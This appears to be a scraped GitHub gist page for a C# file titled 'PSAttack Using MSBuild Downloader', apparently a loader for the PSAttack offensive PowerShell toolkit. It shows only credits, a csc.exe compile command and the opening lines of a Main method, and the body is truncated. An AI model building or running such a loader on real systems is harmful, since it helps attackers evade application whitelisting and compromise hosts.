Skip to content

Instantly share code, notes, and snippets.

@ResistanceIsUseless
Forked from NickTyrer/PSA64.cs
Created February 24, 2020 18:49
Show Gist options
  • Save ResistanceIsUseless/2035d5f4cfea51929225e9a38a2dd545 to your computer and use it in GitHub Desktop.
Save ResistanceIsUseless/2035d5f4cfea51929225e9a38a2dd545 to your computer and use it in GitHub Desktop.
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
static void Main(string[] args)
{
View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment